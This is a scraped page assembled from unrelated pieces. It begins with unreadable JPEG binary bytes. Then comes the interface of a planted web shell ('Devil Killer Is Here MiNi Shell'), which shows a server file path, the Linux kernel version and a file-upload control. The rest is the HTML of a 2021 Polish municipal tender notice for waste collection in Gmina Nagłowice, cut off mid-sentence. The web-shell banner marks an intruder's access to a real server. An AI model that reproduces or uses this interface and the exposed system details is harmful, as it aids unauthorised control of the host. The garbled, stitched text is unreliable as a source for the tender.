JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210520/0005983801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00059838 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Nagłowice oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nagłowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mikołaja Reja 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nagłowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 38 145 67</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">41 38 145 67</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@naglowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.naglowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Nagłowice oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bacbe8c0-b936-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00059838</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009853/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbieranie i zagospodarowanie odpadów z terenu Gminy Nagłowice w okresie od 1 lipca 2021r do 30 czerwca 2022r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.naglowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://naglowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji: elektronicznie na adres e-mail:<br/>gmina@naglowice.pl lub za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://naglowice.ezamawiajacy.pl w zakładce „Korespondencja”.2. Oświadczenia, wnioski,<br/>zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę<br/>wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanych na adres e-mail<br/>Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego.W<br/>przypadku skorzystania z platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje sie datę ich złożenia /wysłania na Platformie.1) Ogólne zasady korzystania z Platformy: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy Nagłowice; https://naglowice.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl.b) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości<br/>zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu<br/>rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. e) Po założeniu konta Wykonawca ma<br/>możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się<br/>datę ich wysłania za pośrednictwem zakładki „Korespondencja”.4) Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy<br/>Nagłowice tel. +48 22 2572223 e-mail: oneplace@marketplanet.pl5) Zamawiający określa<br/>dopuszczalny format podpisu elektronicznego, jako:a) dokumenty w formacie „pdf" zaleca się<br/>podpisywać formatem PAdES,b) dopuszcza się podpisanie dokumentów w formacie innym niż "pdf",<br/>wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany<br/>załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.6) Zamawiający określa<br/>niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:a) Stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;b) Komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;c)<br/>Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w<br/>przypadku Internet Explorer minimalnie wersja 10.0d) Włączona obsługa JavaScript;e) Zainstalowany<br/>program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.7) Zamawiający określa<br/>dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf, doc, xls,<br/>docx, xlsx, jpg, jpeg,zip,XAdES, CAdES,10) W przypadku wnoszenia wadium w formie poręczenia lub<br/>gwarancji:Składając ofertę w postaci elektronicznej oryginał dokumentu wadium (poręczenia lub<br/>gwarancji) opatrzonego podpisem elektronicznym osób upoważnionych do jego wystawienia,<br/>Wykonawca składa załączając na Platformie w zakładce „OFERTY” – poprzez wybranie polecenia<br/>„Dodaj dokument".11)Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny<br/>sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. Postępowanie o<br/>udzielenie zamówienia prowadzi się w języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: a). Administratorem Pani/Pana danych osobowych<br/>jest Gmina Nagłowice ul. Mikołaja Reja 9,28-362 Nagłowice reprezentowana przez Wójta Gminy , tel.<br/>041 38 145-67 fax. 041 145-67 , email: gmina@naglowice.plb) Inspektorem ochrony danych<br/>osobowych w Gminie Nagłowice, ul. Mikołaja Reja 9, 28-362 Nagłowice jest Pan Sylwester Cieśla ul.<br/>Kościuszki 11/110, 25-310 Kielce, który jest dostępny pod adresem e-mail: mail: iod@czi24.pl c).<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego pn:„Odbieranie i zagospodarowanie odpadów<br/>komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy<br/>Nagłowice oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych"d). odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych<br/>(Dz. U. z 2019 r. poz. 2019 z późn. zm.); e). Pani/Pana dane osobowe będą przechowywane, zgodnie<br/>z art. 78 ust. 1 ustawy pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata – przez okres wymagany przepisami<br/>prawa.;f). obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy pzp; g). w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;h). posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie<br/>art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;(Uwaga: skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników)- na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO; (Uwaga: prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego)- prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO;i). nie przysługuje Pani/Panu:- w związku z art. 17 ust.<br/>3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.Jednocześnie Zamawiający przypomina o ciążącym na<br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma<br/>zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 736394,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od<br/>właścicieli nieruchomości zamieszkałych i niezamieszkałych oraz nieruchomości na których<br/>znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe,<br/>wykorzystywane jedynie przez część roku z terenu gminy Nagłowice liczącej 17<br/>sołectw: Brynica Mokra, Caców, Cierno Żabieniec, Chycza Brzóstki, Deszno, Jaronowice,<br/>Kuźnice, Nagłowice, Nowa Wieś, Rakoszyn, Rejowiec, Ślęcin, Trzciniec, Warzyn Pierwszy,<br/>Warzyn Drugi, Zagórze, Zdanowice gromadzonych w sposób selektywny jak i niesegregowany<br/>(zmieszany) oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych.2) Wykonawca<br/>zobowiązany jest do:2.1) zawarcia i okazania Zamawiającemu umowy w zakresie<br/>przekazywania zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałość z<br/>sortowania odpadów komunalnych, przeznaczonych do składowania do instalacji komunalnej do<br/>przetwarzania odpadów komunalnych, wpisanej na listę instalacji komunalnych prowadzonych<br/>przez właściwego marszałka, a w przypadku braku listy wykonawca zobowiązany jest do<br/>przekazywania odpadów do instalacji o której mowa w art. 17 ust. 4 ustawy z dnia 4 lipca 2019 r.<br/>o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw2.2) zapoznania się z regulaminem utrzymania czystości i porządku w gminie oraz<br/>ustalenia zgodnie z nim i z Zamawiającym szczegółowych harmonogramów wykonywania usługi<br/>min. według pkt. 21 niniejszego rozdziału - SWZ, na cały czas trwania usługi, harmonogramy<br/>należy uzgodnić najpóźniej do dnia podpisania umowy,2.3) harmonogram odbioru odpadów<br/>musi uwzględniać cały okres realizacji umowy oraz częstotliwość odbioru odpadów określoną w<br/>pkt.21. Harmonogram musi zawierać także informacje nt. zbiórek systemem „sprzed posesji”<br/>oraz nieruchomości niezamieszkałych.2.4)każda zmiana harmonogramu musi być uzgodniona i<br/>zatwierdzona przez Zamawiającego i dostarczona do właścicieli nieruchomości przed 1 dniem<br/>miesiąca od którego będzie obowiązywała.2.5) Zamawiający dostarczy Wykonawcy własny wzór<br/>harmonogramu w formie kalendarza, który Wykonawca ma obowiązek wydrukować ( wydruk<br/>kolorowy) i dostarczyć do każdej nieruchomości objętej niniejszym zamówieniem.a)wykonawca<br/>w terminie do 5 dni od dnia podpisania umowy ma obowiązek dostarczenia harmonogramu do<br/>właścicieli wszystkich nieruchomości wymienionych w załączniku nr 1 do umowy2.6)<br/>niezwłocznego informowania w pierwszej kolejności Zamawiającego, a następnie właścicieli<br/>nieruchomości o wszelkich zmianach dotyczących odbioru odpadów komunalnych,<br/>harmonogramów lub niemożności dostosowania się do ich wykonania. Wykonawca nie może<br/>wprowadzać żadnych zmian w realizowanej umowie bez zatwierdzenia przez Zamawiającego.<br/>2.7) terminowego i właściwego odbioru odpadów komunalnych z nieruchomości według<br/>ustalonych harmonogramów,2.8) odbioru odpadów wystawionych w pojemnikach lub workach<br/>sprzed nieruchomości zamieszkałych, i niezamieszkałych wywozu i ich zagospodarowania<br/>zgodnie z obowiązującymi przepisami prawa, – które to czynności należy wykonywać w dni<br/>powszednie od poniedziałku do piątku w godzinach pracy Wykonawcy z zastrzeżeniami:a)nie<br/>wolno z nieruchomości do jednego samochodu zbierać jednocześnie odpadów<br/>niesegregowanych (zmieszanych) i selektywnie zebranych odpadów,b)nie wolno mieszać<br/>selektywnie zebranych odpadów komunalnych różnych rodzajów ze sobą.c)jeżeli odbiór<br/>odpadów segregowanych i zmieszanych następuje w tym samym czasie Wykonawca wykonuje<br/>usługę dwoma samochodami odpowiednio oznakowanymi w tym napisy „Selektywna zbiórka” i<br/>„zmieszane odpady komunalne”,2.9) Do obowiązków Wykonawcy w zakresie utrzymania<br/>porządku i czystości miejsc po odbiorze odpadów należy w szczególności:a)posprzątanie<br/>miejsca wokół pojemników, gdy zajdzie taka potrzeba, między innymi poprzez zabranie<br/>dostawionych przy pojemnikach worków ze zmieszanymi odpadami<br/>komunalnymi;b)porządkowanie terenu zanieczyszczonego odpadami komunalnymi i innymi<br/>zanieczyszczeniami wysypanymi z pojemników, worków, pojazdów w trakcie realizacji usługi<br/>wywozu, w szczególności podczas załadunku lub kontroli.c) po opróżnieniu pojemników na<br/>odpady, Wykonawca ma obowiązek ustawienia ich w sposób, który nie będzie zagrażał<br/>bezpieczeństwu ruchu osób oraz pojazdów.2.10) ponoszenia pełnej odpowiedzialność wobec<br/>Zamawiającego i osób trzecich za szkody na mieniu, zdrowiu osób trzecich, powstałe podczas i<br/>w związku z realizacją przedmiotu umowy, w zakresie określonym w Kodeksie Cywilnym i<br/>innych ustawach. Szczegółowy opis przedmiotu zamówienia zawarty został w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-07-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryteriami: Cena -<br/>60% Termin płatności faktury - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia<br/>warunków w tym zakresie 2) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów: W celu potwierdzenia spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących<br/>podmiotowych środków dowodowych w zakresie:- Wykonawca winien wykazać posiadanie<br/>aktualnego zezwolenia na transport odpadów wydane przez właściwy organ na podstawie<br/>ustawy z dnia 14 grudnia 2012r o odpadach lub odpowiadające mu zezwolenie na transport<br/>odpadów wydane na podstawie wcześniej obowiązujących przepisów lub podać numer<br/>rejestrowy pod którym podmiot posiada wpis do Bazy Danych o produktach i opakowaniach oraz<br/>o Gospodarce Odpadami- Wykonawca winien wykazać posiadanie aktualnego zezwolenia na<br/>odbiór zużytego sprzętu elektrycznego i elektronicznego lub odpowiadające mu zezwolenie na<br/>transport odpadów wydane na podstawie wcześniej obowiązujących przepisów lub podać numer<br/>rejestrowy pod którym podmiot posiada wpis do Bazy Danych o produktach i opakowaniach oraz<br/>o Gospodarce Odpadami- Wykonawca winien wykazać 